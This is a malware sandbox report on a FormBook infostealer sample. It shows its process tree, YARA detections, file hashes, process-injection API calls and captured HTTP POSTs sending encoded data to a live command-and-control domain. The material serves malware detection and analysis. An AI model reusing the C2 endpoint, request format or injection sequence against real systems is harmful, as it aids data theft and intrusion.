                                                                                                            Data Ascii: ++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-


Session ID: 33
Source IP: 192.168.2.6
Source Port: 50026
Destination IP: 104.21.32.1
Destination Port: 80
PID: 1436
Process: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe

Timestamp: Jan 11, 2025 04:27:28.723066092 CET
Bytes transferred: 759
Direction: OUT
Data:
POST /2pcx/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.aziziyeescortg.xyz
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 209
                                                                                                            Connection: close
                                                                                                            Origin: http://www.aziziyeescortg.xyz
                                                                                                            Referer: http://www.aziziyeescortg.xyz/2pcx/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=btkQLzgK81PCQHtN38mMbsA6zcBUm83GXu4vZt7O8301T7Uni7QAql86B3C1j/1mhO9sGMxCMAOCi/BTRHwOjZfwRmMplXlrGu5YilNnNP/HBEeg/+E95fH8p7sg6nnbQ1TGjLMAmy5SMpjvbReWltw/2lpGUYXRQ9Ci1Zyg2An+bC9tBDH5OywuJCHIoDhBtGTzx3KHoV4Z
Timestamp: Jan 11, 2025 04:27:29.362637043 CET
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 11 Jan 2025 03:27:29 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            Pragma: no-cache
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=abixDaLA%2FAyUIyB7Gyp9r7bsVHdCfNHnxwFLzCmZcXEvvlcmZj%2FmhYVVL4VtOY7%2F%2FADde1zJkLznXDNMc%2Fc%2FjPfycCy4aH%2BSHMKmfRWXY%2FhbF8MRphsh8OPQivIXmnOfUbnN2c25nXs6"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9001cfaf0b578cda-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1761&rtt_var=880&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=759&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID: 34
Source IP: 192.168.2.6
Source Port: 50027
Destination IP: 104.21.32.1
Destination Port: 80
PID: 1436
Process: C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe

Timestamp: Jan 11, 2025 04:27:31.271197081 CET
Bytes transferred: 783
Direction: OUT
Data:
POST /2pcx/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.aziziyeescortg.xyz
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 233
                                                                                                            Connection: close
                                                                                                            Origin: http://www.aziziyeescortg.xyz
                                                                                                            Referer: http://www.aziziyeescortg.xyz/2pcx/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                                            Data Ascii: 9PZt=btkQLzgK81PCRn9N1fOMKcA5vsBUpc3KXpwvZoL48CE1TbknsfEArl86KXD/tf19hO4bGI5CMAKCi69TQ0Z8hJfyaGMr4nlrGu5YilICNP3Hdkug+fE+0/H/47sg+nnAQ1TwjKg6m0lSMoTvVjmVvtw55FoYfbKof+DA+KfY2APLTUg3dwHaciQsJAf6ojhrvGrzjgGgnhd6mPzjqQ2HAesZwDBTZ6MeuA==
Timestamp: Jan 11, 2025 04:27:31.902353048 CET
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 11 Jan 2025 03:27:31 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            Pragma: no-cache
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IWKTe%2BVKrs8SVuEO1Qixa5Z3DhIs65kYAaMdydSsU%2BEjmJAz1uuiCdHr0tAeoY7l1x1LpMhl5WSYp%2FJAEAmUdbbI3SHT88DvbS6w%2BgPLktX%2BxNIUd1MfjqMaKGx4M7wCmauc9uiEhd96"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9001cfbeee308cda-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1783&rtt_var=891&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=783&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID: 35
Source IP: 192.168.2.6
Source Port: 50028
Destination IP: 104.21.32.1
Destination Port: 80

Timestamp: Jan 11, 2025 04:27:34.380592108 CET
Bytes transferred: 1796
Direction: OUT
Data:
POST /2pcx/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            Host: www.aziziyeescortg.xyz
                                                                                                            Cache-Control: max-age=0
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Content-Length: 1245
                                                                                                            Connection: close
                                                                                                            Origin: http://www.aziziyeescortg.xyz
                                                                                                            Referer: http://www.aziziyeescortg.xyz/2pcx/
                                                                                                            User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Timestamp: Jan 11, 2025 04:27:34.991112947 CET
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 404 Not Found
                                                                                                            Date: Sat, 11 Jan 2025 03:27:34 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                            Pragma: no-cache
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eK4381bU4f0y4%2Fst3HTiPCypINiMaFLufdi26j7X%2BqaOtEelLjufxFb%2F0hl4pXkq8j1FZJLBQa6uc%2FMOoOQjkvEYTVzsCUyddZ6DRN1HqwMn6i9c4CXihJN%2Bc7YOL7xR2fCHT%2B0anvVt"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 9001cfd23f1d1875-EWR
                                                                                                            Content-Encoding: gzip
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1519&min_rtt=1519&rtt_var=759&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1796&delivery_rate=0&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                            Target ID:0
                                                                                                            Start time:22:24:26
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\BalphRTkPS.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\BalphRTkPS.exe"
                                                                                                            Imagebase:0xb90000
                                                                                                            File size:962'560 bytes
                                                                                                            MD5 hash:E3B4DDAA99A7555532EA6B36BFF69AFC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:6
                                                                                                            Start time:22:24:44
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Users\user\Desktop\BalphRTkPS.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\BalphRTkPS.exe"
                                                                                                            Imagebase:0xac0000
                                                                                                            File size:962'560 bytes
                                                                                                            MD5 hash:E3B4DDAA99A7555532EA6B36BFF69AFC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2499317497.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2498193963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2505138823.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:7
                                                                                                            Start time:22:24:53
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe"
                                                                                                            Imagebase:0x5e0000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4013556321.0000000002840000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:8
                                                                                                            Start time:22:24:55
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Windows\SysWOW64\ieUnatt.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\ieUnatt.exe"
                                                                                                            Imagebase:0x980000
                                                                                                            File size:122'880 bytes
                                                                                                            MD5 hash:4E9919DF2EF531B389ABAEFD35AD546E
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4014023454.0000000004D30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4013880559.0000000004CE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:false

                                                                                                            Target ID:10
                                                                                                            Start time:22:25:08
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\CVnNmScBntxJgmrozRwUnYXtrelnfCoqbaiMYsyBpiDGetFXKnFDSwJewNjWwcuK\ikSQhwOmrrnfH.exe"
                                                                                                            Imagebase:0x5e0000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4016477333.0000000005150000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            Target ID:11
                                                                                                            Start time:22:25:20
                                                                                                            Start date:10/01/2025
                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                            Imagebase:0x7ff728280000
                                                                                                            File size:676'768 bytes
                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:9.6%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:61
                                                                                                              Total number of Limit Nodes:5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd

                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0750DF1E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0

                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0750DF1E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0

                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 012AB17E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333481694.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12a0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0

                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 012A59C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333481694.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12a0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 188 12a449c-12a59d9 CreateActCtxA 191 12a59db-12a59e1 188->191 192 12a59e2-12a5a3c 188->192 191->192 199 12a5a4b-12a5a4f 192->199 200 12a5a3e-12a5a41 192->200 201 12a5a60 199->201 202 12a5a51-12a5a5d 199->202 200->199 204 12a5a61 201->204 202->201 204->204
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 012A59C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333481694.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12a0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 205 750da58-750daae 208 750dab0-750dabc 205->208 209 750dabe-750dafd WriteProcessMemory 205->209 208->209 211 750db06-750db36 209->211 212 750daff-750db05 209->212 212->211
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0750DAF0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 216 74e5d50-74e5da4 218 74e5daf-74e5dbe 216->218 219 74e5da6-74e5dac 216->219 220 74e5dc3-74e5dfc DrawTextExW 218->220 221 74e5dc0 218->221 219->218 222 74e5dfe-74e5e04 220->222 223 74e5e05-74e5e22 220->223 221->220 222->223
                                                                                                              APIs
                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 074E5DEF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2337996899.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74e0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DrawText
                                                                                                              • String ID:
                                                                                                              • API String ID: 2175133113-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 245 750db48-750dbdd ReadProcessMemory 249 750dbe6-750dc16 245->249 250 750dbdf-750dbe5 245->250 250->249
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0750DBD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 235 750da60-750daae 237 750dab0-750dabc 235->237 238 750dabe-750dafd WriteProcessMemory 235->238 237->238 240 750db06-750db36 238->240 241 750daff-750db05 238->241 241->240
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0750DAF0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 226 74e5d58-74e5da4 227 74e5daf-74e5dbe 226->227 228 74e5da6-74e5dac 226->228 229 74e5dc3-74e5dfc DrawTextExW 227->229 230 74e5dc0 227->230 228->227 231 74e5dfe-74e5e04 229->231 232 74e5e05-74e5e22 229->232 230->229 231->232
                                                                                                              APIs
                                                                                                              • DrawTextExW.USER32(?,?,?,?,?,?), ref: 074E5DEF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2337996899.00000000074E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_74e0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DrawText
                                                                                                              • String ID:
                                                                                                              • API String ID: 2175133113-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 254 750d4b8-750d50b 257 750d51b-750d51e 254->257 258 750d50d-750d519 254->258 259 750d525-750d54b Wow64SetThreadContext 257->259 258->257 260 750d554-750d584 259->260 261 750d54d-750d553 259->261 261->260
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0750D53E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 271 12ad808-12ad80b 272 12ad810-12ad8a4 DuplicateHandle 271->272 273 12ad8ad-12ad8ca 272->273 274 12ad8a6-12ad8ac 272->274 274->273
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012AD7D6,?,?,?,?,?), ref: 012AD897
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333481694.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12a0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 265 12abca0-12ad8a4 DuplicateHandle 267 12ad8ad-12ad8ca 265->267 268 12ad8a6-12ad8ac 265->268 268->267
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,012AD7D6,?,?,?,?,?), ref: 012AD897
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333481694.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12a0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 277 750d4c0-750d50b 279 750d51b-750d54b Wow64SetThreadContext 277->279 280 750d50d-750d519 277->280 282 750d554-750d584 279->282 283 750d54d-750d553 279->283 280->279 283->282
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0750D53E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0

                                                                                                              Control-flow Graph

                                                                                                              control_flow_graph 287 750db50-750dbdd ReadProcessMemory 290 750dbe6-750dc16 287->290 291 750dbdf-750dbe5 287->291 291->290
                                                                                                              APIs
                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0750DBD0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 1726664587-0
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0750DA0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0750DA0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 075C047D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338736594.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_75c0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 410705778-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338168158.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7500000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 012AB17E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2333481694.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_12a0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              APIs
                                                                                                              • PostMessageW.USER32(?,?,?,?), ref: 075C047D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2338736594.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_75c0000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessagePost
